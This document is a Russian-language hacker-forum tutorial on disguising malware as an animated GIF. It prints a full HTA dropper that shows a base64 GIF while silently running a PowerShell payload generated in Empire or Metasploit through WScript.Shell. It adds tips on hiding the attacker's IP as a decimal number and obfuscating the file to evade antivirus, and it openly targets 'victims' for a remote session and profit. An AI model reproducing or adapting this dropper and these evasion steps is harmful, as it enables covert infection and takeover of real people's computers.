Вшиваем вирус в GIF
Нашел для вас метод заражения наших с вами "любимых клиентов". Все будет, как Мы любим: весело, легко и скрытно)
Поехали!
Гифка была выбрана эта, остается разобраться с кодом:
Для начала генерируем powershell в Empire или Metasploit
я выбрал ..
>>>КОД СКРИПТА<<<
- <html>
- <head>
- <title>NazvanieGif</title>
- <hta:application id="NazvanieGif"
- border="thin"
- borderstyle="complex"
- maximizeButton="no"
- minimizeButton="no"
- />
- </head>
- <script type="text/javascript">
- var index = -1;
- var images = [
- "data:image/gif;base64,"];
- function initGallery(){
- window.resizeTo(300,300);
- htaPayload();
- nextPicture();
- }
- function nextPicture(){
- var img;
- index = index + 1;
- if (index > images.length -1 ){
- index = 0;
- }
- img = document.getElementById("gallery");
- img.src = images[index];
- }
- function htaPayload(){
- var payload="";
- try{
- if (navigator.userAgent.indexOf("Windows") !== -1){
- new ActiveXObject("WScript.Shell").Run("CMD /C START /B " + payload, false);
- }
- }
- catch(e){
- }
- }
- </script>
- <style>
- #gallery, div {
- width: 100%;
- height: 100%;
- }
- #outer {
- text-align: center;
- }
- #inner{
- display: inline-block;
- }
- body {
- background-color: black;
- }
- </style>
- <body onload="initGallery()">
- <div id="outer">
- <div id="inner">
- <img id="gallery" onclick="nextPicture()">
- </div>
- </div>
- </body>
- </html>
и вставляем в 37 строчку между:
Далее переходим на очень полезный онлайн ресурс
Иногда он выручает для различного рода задач, например, при кодировке IP адреса в бинарник для последующего его скрытия.
Немножечко отступлю от темы покажу: например скрываем 127.0.0.1
127 = 1111111, 0 = 0 и 1 = 1 преобразовываем точки и получаем 01111111000000000000000000000001 = 2130706433 ИТОГ http: // 2130706433
Такти образом переводим нашу GIF-ку в формат base64, копируем полученную кодировочку и вставляем в
Как видите в 17 строку)
Осталось последнее действие конвертировать, а точнее обфусцировать, то есть спрятать вредный код от антивирусов в этой замечательной программе
Сохраняем полученный код в блокноте, под любым именем, но в формате .hta
Заключение: При запуске у жертвы появится Ваша злая GIF-ka c котиком, а к Вам прилетит заветная сессия)
А деньги с профита можно безопасно вывести через...